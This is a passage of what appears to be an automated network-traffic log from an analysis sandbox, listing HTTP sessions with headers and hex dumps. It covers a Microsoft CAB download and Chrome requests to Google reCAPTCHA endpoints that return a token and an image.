                                                                                                                                                                                                                                                                  MS-CV: mAizcpaUpkm2Ap65.0
                                                                                                                                                                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:29 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Content-Length: 30005
                                                                                                                                                                                                                                                                  2024-10-29 19:10:30 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                  2024-10-29 19:10:30 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  80192.168.2.1649809142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5837
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC5837OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 34 67 79 47 6b 37 58 71 66 51 50 41 6a 53 75 58 70 54 53 38 6f 77 71 4b 4d 65 6f 77 41 71 33 55 49 75 58 2d 69 34 45 35 2d 4d 74 64 63 54 64 47 45 41 6b 46 4e 74 6e 75 47 37 57 4a 41 58 51 4d 4d 52 58 54 69 4b 52 36 35 73 54 33 65 56 38 45 68 64 38 48 5f 63 64 4b 49 6f 6d 61 57 39 35 46 72 73 4a 47 59 4b 52 66 46 59 53 50 6f 46 42 4f 38 50 68 37 78 37 56 6e 74 65 64 4f 44 67 6f 66 2d 66 48 38 44 6d 50 52 62 48 39 59 4f 6b 4a 39 70 6b 7a 35 59 41 79 31 72 48 69 4c 4c 6c 43 70 59 47 65 6c 44 6f 79 48 5a 31 74 58 58 36 67 53 41 55 4c 5a 46 56 42 6b 37 75 63 6d 54 4a 41 48 48 6a 51 69 74 4c 51 67 6a 4d 72 74 42 2d 46 69 79 71 59 74 4a 53 6e 49 68 71
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA4gyGk7XqfQPAjSuXpTS8owqKMeowAq3UIuX-i4E5-MtdcTdGEAkFNtnuG7WJAXQMMRXTiKR65sT3eV8Ehd8H_cdKIomaW95FrsJGYKRfFYSPoFBO8Ph7x7VntedODgof-fH8DmPRbH9YOkJ9pkz5YAy1rHiLLlCpYGelDoyHZ1tXX6gSAULZFVBk7ucmTJAHHjQitLQgjMrtB-FiyqYtJSnIhq
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:33 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC684INData Raw: 31 37 64 30 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 48 76 6a 38 4b 79 52 4b 75 57 4a 6f 32 4f 7a 73 65 65 33 33 53 4a 6b 6b 68 47 58 43 6c 35 76 66 67 71 6e 78 42 32 4f 79 35 49 67 35 48 69 61 6a 61 6b 70 4d 64 37 65 57 76 55 6a 47 33 70 49 53 4c 32 32 30 42 73 74 33 36 6b 2d 57 52 2d 5f 4d 52 33 6c 41 52 2d 77 30 31 79 78 55 35 37 69 37 37 6b 77 43 69 50 56 62 44 5a 52 73 6b 6c 41 6b 61 64 72 61 51 53 69 4c 63 75 4c 50 53 56 72 6e 56 70 63 57 35 35 37 5a 7a 42 61 7a 6f 73 71 56 67 4b 51 62 5f 63 55 77 38 4f 37 7a 4f 63 35 66 53 38 42 35 31 4a 58 36 7a 33 64 32 79 34 39 67 37 6b 63 49 33 7a 6e 42 56 5a 6e 45 53 6c 68 6b 34 52 49 50 79 75 39 4d 54 4d 65 72 39 64 4e 6c 47 39 64 4d 50 71 55 4a 55 69 47 4a 6a 33 4d 51 53
                                                                                                                                                                                                                                                                  Data Ascii: 17d0)]}'["dresp","03AFcWeA5Hvj8KyRKuWJo2Ozsee33SJkkhGXCl5vfgqnxB2Oy5Ig5HiajakpMd7eWvUjG3pISL220Bst36k-WR-_MR3lAR-w01yxU57i77kwCiPVbDZRsklAkadraQSiLcuLPSVrnVpcW557ZzBazosqVgKQb_cUw8O7zOc5fS8B51JX6z3d2y49g7kcI3znBVZnESlhk4RIPyu9MTMer9dNlG9dMPqUJUiGJj3MQS
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC1378INData Raw: 78 65 53 69 35 6d 35 70 38 65 7a 4e 62 64 70 33 76 42 75 67 6a 53 6a 57 39 74 39 74 30 39 51 37 5a 78 57 32 50 51 56 69 37 6f 52 55 69 35 49 71 77 51 69 38 6f 41 59 2d 34 4c 61 71 45 74 73 73 44 7a 4d 67 43 33 34 6a 54 43 74 4b 72 6a 58 52 44 7a 4a 61 75 77 73 7a 63 32 2d 74 46 79 4b 73 45 48 5f 69 2d 43 43 50 5f 35 36 4b 62 4c 37 6e 61 4e 49 44 63 4b 59 4e 33 6b 7a 45 61 38 43 4e 67 76 57 5a 64 47 31 50 54 4d 6e 6f 77 6a 33 55 5f 58 66 61 6c 39 46 33 4e 59 41 30 66 57 6d 73 42 49 44 6e 52 66 6d 55 51 35 58 5a 5f 74 43 69 35 64 77 67 71 4e 4b 53 43 52 4b 38 58 51 38 6b 65 4b 47 58 48 50 64 75 6d 39 57 33 43 63 37 73 58 64 76 39 5f 36 4e 77 47 36 51 77 55 48 49 64 34 7a 5f 47 2d 49 4e 70 38 44 37 66 53 76 59 43 54 46 66 76 37 36 67 78 43 6c 77 6e 48 59 6a
                                                                                                                                                                                                                                                                  Data Ascii: xeSi5m5p8ezNbdp3vBugjSjW9t9t09Q7ZxW2PQVi7oRUi5IqwQi8oAY-4LaqEtssDzMgC34jTCtKrjXRDzJauwszc2-tFyKsEH_i-CCP_56KbL7naNIDcKYN3kzEa8CNgvWZdG1PTMnowj3U_Xfal9F3NYA0fWmsBIDnRfmUQ5XZ_tCi5dwgqNKSCRK8XQ8keKGXHPdum9W3Cc7sXdv9_6NwG6QwUHId4z_G-INp8D7fSvYCTFfv76gxClwnHYj
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC1378INData Raw: 72 4a 4f 36 55 73 6c 6a 30 33 37 49 73 2d 57 36 75 51 63 31 70 49 38 58 34 72 52 59 7a 74 54 38 63 6d 66 52 6d 63 6a 59 47 4d 54 32 77 2d 55 47 4e 4d 68 50 37 41 6a 6a 65 32 76 31 52 48 6f 66 49 52 4b 4c 30 56 65 71 50 31 73 42 76 32 31 61 4d 36 59 4e 53 36 41 61 5a 75 50 68 57 58 55 77 75 78 67 4e 6b 4b 43 52 45 57 52 7a 33 76 31 4c 36 50 66 6b 31 4a 6d 6b 75 76 76 6b 46 5f 6c 44 36 55 41 66 30 4c 6a 56 61 5a 43 6d 78 73 31 39 6c 56 44 6a 36 47 31 32 34 6b 39 48 48 4a 45 56 72 67 4b 46 59 37 38 6c 74 48 43 34 47 6c 6e 65 61 57 36 4a 44 5a 55 44 67 56 55 39 36 78 51 66 35 75 65 67 54 58 35 47 74 77 35 67 44 4f 79 53 73 59 76 44 78 68 74 35 33 4d 4f 6b 78 33 41 57 79 56 74 5a 75 4c 50 77 56 6b 46 64 69 54 5a 67 7a 38 55 6e 45 35 56 34 4d 73 49 45 51 44 4e
                                                                                                                                                                                                                                                                  Data Ascii: rJO6Uslj037Is-W6uQc1pI8X4rRYztT8cmfRmcjYGMT2w-UGNMhP7Ajje2v1RHofIRKL0VeqP1sBv21aM6YNS6AaZuPhWXUwuxgNkKCREWRz3v1L6Pfk1JmkuvvkF_lD6UAf0LjVaZCmxs19lVDj6G124k9HHJEVrgKFY78ltHC4GlneaW6JDZUDgVU96xQf5uegTX5Gtw5gDOySsYvDxht53MOkx3AWyVtZuLPwVkFdiTZgz8UnE5V4MsIEQDN
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC1378INData Raw: 58 47 34 33 48 75 62 4c 39 41 2d 55 2d 69 76 46 4d 6d 31 65 7a 68 75 63 39 69 64 61 4b 33 5f 36 7a 34 53 36 47 63 56 51 36 49 30 4d 66 36 35 62 48 59 69 39 46 4c 56 64 38 63 39 74 68 4f 65 51 65 36 4f 73 45 77 76 7a 44 6d 74 30 4a 4a 4a 30 4a 77 4a 62 37 7a 75 67 59 62 36 47 44 53 4c 5a 6a 2d 37 66 76 63 63 54 45 79 61 73 67 48 4e 70 31 4e 6a 78 46 59 35 4e 30 41 67 61 6a 71 6e 51 44 64 44 67 4f 6b 4b 4e 7a 55 34 4e 46 70 33 39 67 35 49 51 52 67 58 5a 33 66 44 4c 43 69 68 47 46 4e 67 6b 59 64 34 43 4b 68 39 49 36 68 76 65 61 37 73 41 76 37 35 55 32 52 50 41 47 4d 73 75 63 46 36 36 35 77 71 5a 30 61 32 47 71 31 74 63 39 77 62 6b 64 69 41 46 68 70 63 4e 37 42 59 67 6e 39 31 57 38 35 37 43 75 5a 34 7a 6b 64 6e 46 62 47 2d 71 31 39 52 2d 46 69 49 53 65 74 55
                                                                                                                                                                                                                                                                  Data Ascii: XG43HubL9A-U-ivFMm1ezhuc9idaK3_6z4S6GcVQ6I0Mf65bHYi9FLVd8c9thOeQe6OsEwvzDmt0JJJ0JwJb7zugYb6GDSLZj-7fvccTEyasgHNp1NjxFY5N0AgajqnQDdDgOkKNzU4NFp39g5IQRgXZ3fDLCihGFNgkYd4CKh9I6hvea7sAv75U2RPAGMsucF665wqZ0a2Gq1tc9wbkdiAFhpcN7BYgn91W857CuZ4zkdnFbG-q19R-FiISetU
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC1286INData Raw: 33 47 79 4f 77 66 52 45 30 4f 69 61 38 36 4e 43 70 53 6d 75 77 77 6c 37 57 70 73 74 6d 6d 67 79 39 33 76 37 4b 49 77 61 4f 4a 34 71 35 31 71 36 6e 73 2d 54 55 51 54 44 4e 35 41 47 70 66 6c 61 59 7a 6b 4a 57 50 6c 41 51 61 4b 45 73 46 69 4c 4a 4c 4b 4a 52 49 6b 4e 49 61 52 6e 6c 66 30 42 4c 37 50 6a 59 68 52 4d 76 39 78 31 68 33 2d 5a 52 42 52 4e 45 6f 65 7a 68 39 76 6e 70 48 44 54 39 36 4a 61 56 55 74 76 45 4d 45 53 50 6b 4a 47 54 75 46 4b 30 73 4d 4f 47 30 41 73 68 56 4e 38 73 70 65 31 71 41 55 48 56 6e 36 6e 32 5a 4e 61 54 34 6c 7a 41 32 63 54 50 65 33 6d 69 6c 30 4a 71 59 35 70 78 53 55 33 61 5a 46 50 79 41 48 6a 46 48 37 77 70 7a 6a 6b 69 63 47 68 79 47 31 71 39 74 69 78 79 64 58 68 67 53 78 44 4a 43 41 61 46 68 76 74 68 4a 2d 73 67 4a 4a 4b 64 47 35
                                                                                                                                                                                                                                                                  Data Ascii: 3GyOwfRE0Oia86NCpSmuwwl7Wpstmmgy93v7KIwaOJ4q51q6ns-TUQTDN5AGpflaYzkJWPlAQaKEsFiLJLKJRIkNIaRnlf0BL7PjYhRMv9x1h3-ZRBRNEoezh9vnpHDT96JaVUtvEMESPkJGTuFK0sMOG0AshVN8spe1qAUHVn6n2ZNaT4lzA2cTPe3mil0JqY5pxSU3aZFPyAHjFH7wpzjkicGhyG1q9tixydXhgSxDJCAaFhvthJ-sgJJKdG5
                                                                                                                                                                                                                                                                  2024-10-29 19:10:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  81192.168.2.1649811142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:34 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA4blY5MVPIuxvSqI2F8cJcTKI2jykD8dKcYCKNyJQdUqY-SQpdKOMdYDiVMy4PmaNToi6BkEpkYn5Zl4Gtipty5tV9tppOBZgn-Pgvikm2gLFlilOhjl2gYxwcbr39AqOMgA0M752LSRhzi28wHTsBKKrDYHyZwev37Obyl2ymyAWoy6C_LXFsPc9tyfe9W6qCDaYfwhprtiyWI7IdDeYk-gjLmVg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=34d5e020329daa00 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:34 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:34 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC697INData Raw: 31 37 64 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 17d3JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC1378INData Raw: 7d 32 da cd 7f a7 5a 1b 68 d9 99 61 b8 66 79 d8 e7 0c e7 24 81 f7 7a f6 ce 0d 75 1a 2d a5 cd 8e 99 15 b5 e5 c3 cb 71 82 59 8c bb c2 bf 1c 03 9e 07 a8 cf 71 ef 58 28 b7 6f eb fa ee ff 00 e1 cb 93 ba 4d f5 fb d6 fa 5b d1 2f bf cc ba 8b 04 11 c7 0d b5 ba 5b 81 f2 5b 29 8c 95 4e 32 02 8f ff 00 56 46 3b 9a 21 75 6c 48 f0 c8 55 f0 81 23 62 03 29 c8 ef 90 7f 84 76 07 9e 33 c5 46 24 81 21 21 c0 68 9c b3 05 3c a9 0c 30 4f 42 39 c7 e3 d4 64 d4 af be 45 76 4f 31 c9 66 2c 08 e4 74 0c 09 eb d4 93 db a9 cf 53 5b a8 f3 69 dc c9 3b 35 6f eb fa fe bc 9d 64 1e e2 28 e2 65 55 18 1b 19 78 3b d8 0c 63 f9 81 92 3a 73 9c 1a 7d 9e 0a 07 49 59 ad 13 69 1b 4e 01 3c af 1c 0e 32 48 cf 3d 7f 1a 8a 46 8a 39 ae 27 b8 11 7d 9f ca cb be e2 43 00 72 c7 8c 92 36 f0 71 cf 6f 4a 68 be 1b 44
                                                                                                                                                                                                                                                                  Data Ascii: }2Zhafy$zu-qYqX(oM[/[[)N2VF;!ulHU#b)v3F$!!h<0OB9dEvO1f,tS[i;5od(eUx;c:s}IYiN<2H=F9'}Cr6qoJhD
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC1378INData Raw: 8a d6 9c e3 52 49 db fa fe bf 21 42 4e 76 6f f2 df e7 f8 2f f2 b1 e6 3a 7f 85 7c 4d a8 5c b2 c7 a7 5e bb 02 43 07 5f 2f 83 8d c4 16 e4 0e 31 f8 1e dd 36 f4 df 00 6b 17 65 e1 bf 9e de da 4d b1 ca c6 48 cb 15 5c b6 00 23 01 be e9 ef dc 1c 9c d7 4f 75 e3 eb 89 2f f1 6d 65 0a f9 91 06 49 67 9d 9b 07 e7 f9 86 d5 18 fb c0 e0 f3 d7 b7 4c 39 3c 4f 7f 75 a9 4d 38 bc 86 d6 36 48 e3 00 6e 3b 94 6f fe 26 24 8c 6e ed f9 9c 8a d2 f2 6f b7 c9 7f 5f 87 4d 4c e3 1a 77 4d be ce f6 ed eb df f4 f9 9a e7 e1 bd bd b2 46 92 6b 17 a1 ca 0d c2 08 c2 2e 47 ca 78 27 39 ca f5 fa 51 58 be 3a d6 75 1b 0f 13 dd d9 45 ad 6a 16 eb 0e d1 b5 01 6c e5 41 24 90 a7 a9 3e be 94 54 28 c1 ea ed f3 47 5c 65 85 8a b4 e0 af f2 ff 00 33 b5 d3 fc 79 ae e8 c7 4c 95 64 4b a4 b1 05 62 88 31 78 f6 95 c7
                                                                                                                                                                                                                                                                  Data Ascii: RI!BNvo/:|M\^C_/16keMH\#Ou/meIgL9<OuM86Hn;o&$no_MLwMFk.Gx'9QX:uEjlA$>T(G\e3yLdKb1x
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC1378INData Raw: f6 ce e6 39 96 3f 36 dd 48 51 12 93 b8 60 e4 0d bc 64 81 9c 7e 7c 0c e7 6b 1a 95 d2 4d f6 66 91 57 6a a6 48 0d 85 24 64 b6 0f 0a 73 c6 47 41 e9 df a4 f1 55 b4 df da df 64 16 30 ec b6 55 5f 38 3e f8 c1 e9 d7 1c 63 18 e7 07 8c fd 70 f5 8b fb 3d 37 56 92 de 7b 34 94 14 56 51 e5 aa 05 e0 0e 32 7a f4 1e bc 1f c7 8e 84 93 51 b4 6e f5 ec 76 54 83 5c ce 52 b7 e3 fd 7f 57 45 19 35 5b a7 d3 e7 bb 8a 55 82 64 f2 d0 6d 5c 39 50 0e 5b 23 19 ed ce 32 7f 5a e9 fc 25 a9 5f 0d 32 1b 8f 35 a5 1b c2 49 2f 0a 40 dd 8c 63 d8 11 ce 2b 2b 4e be b6 d4 ec 26 68 ad 2d e2 90 c3 b4 a2 20 2a 98 fb a7 6e 38 f7 6e 80 7a 02 4d 7a 0f c1 8b 07 d5 3e df a6 06 8a 06 82 10 e2 49 62 1e 59 c9 03 20 64 70 33 d7 38 3c f5 ad 23 f1 25 15 66 9f 96 c1 38 4a 54 f9 9c ae ad 6f c7 56 61 47 a8 18 ef 51
                                                                                                                                                                                                                                                                  Data Ascii: 9?6HQ`d~|kMfWjH$dsGAUd0U_8>cp=7V{4VQ2zQnvT\RWE5[Udm\9P[#2Z%_25I/@c++N&h- *n8nzMz>IbY dp38<#%f8JToVaGQ
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC1276INData Raw: 91 db 8e 31 d3 02 8a 9a fb 55 b4 12 a8 9e 6b d5 6d 83 fd 49 69 54 e7 92 72 41 ef 9f f2 68 a3 d9 c6 5a ff 00 5f 91 9b fa c5 fd d5 1b 7f 5e 67 cd 1a f7 81 b5 b9 2f ae 25 d2 74 d7 8e c0 5c 62 d2 23 22 16 8c 11 9e 99 e7 ee 8c 1f 7a ca bb f0 5f 89 ec a3 4f 36 c1 a2 e7 78 65 95 0e ef 98 e4 64 36 3a 8c 72 79 e2 bd ca 2f 14 59 c9 33 3d ac 1a bd cb c7 92 eb 2e 18 42 01 cb 2b 11 cf 46 e0 8f 43 c5 3b 59 bd b5 bc 76 8c 3a dc 92 bf 2c 48 ed e6 48 72 43 92 b8 e4 03 8e fc 90 de d5 51 a9 64 b4 d3 fa d3 fa f5 db 51 b6 9f 47 ff 00 07 b5 be 7b 5d 7e 6c f0 ff 00 f8 43 35 e8 e7 89 64 b3 58 b7 95 23 ce 94 20 c1 20 e3 2c 72 4f 39 c6 78 1c f3 5d 87 c2 fd 23 59 b0 9c 5b 4a 2d 16 09 4a bc 8b f6 b4 0e b8 3b 5b e6 53 9c 80 3a 64 77 1e f5 d1 c5 6d a9 4b 12 fd 9f 44 96 ed 11 42 23 f9
                                                                                                                                                                                                                                                                  Data Ascii: 1UkmIiTrAhZ_^g/%t\b#"z_O6xed6:ry/Y3=.B+FC;Yv:,HHrCQdQG{]~lC5dX# ,rO9x]#Y[J-J;[S:dwmKDB#
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  82192.168.2.1649810142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
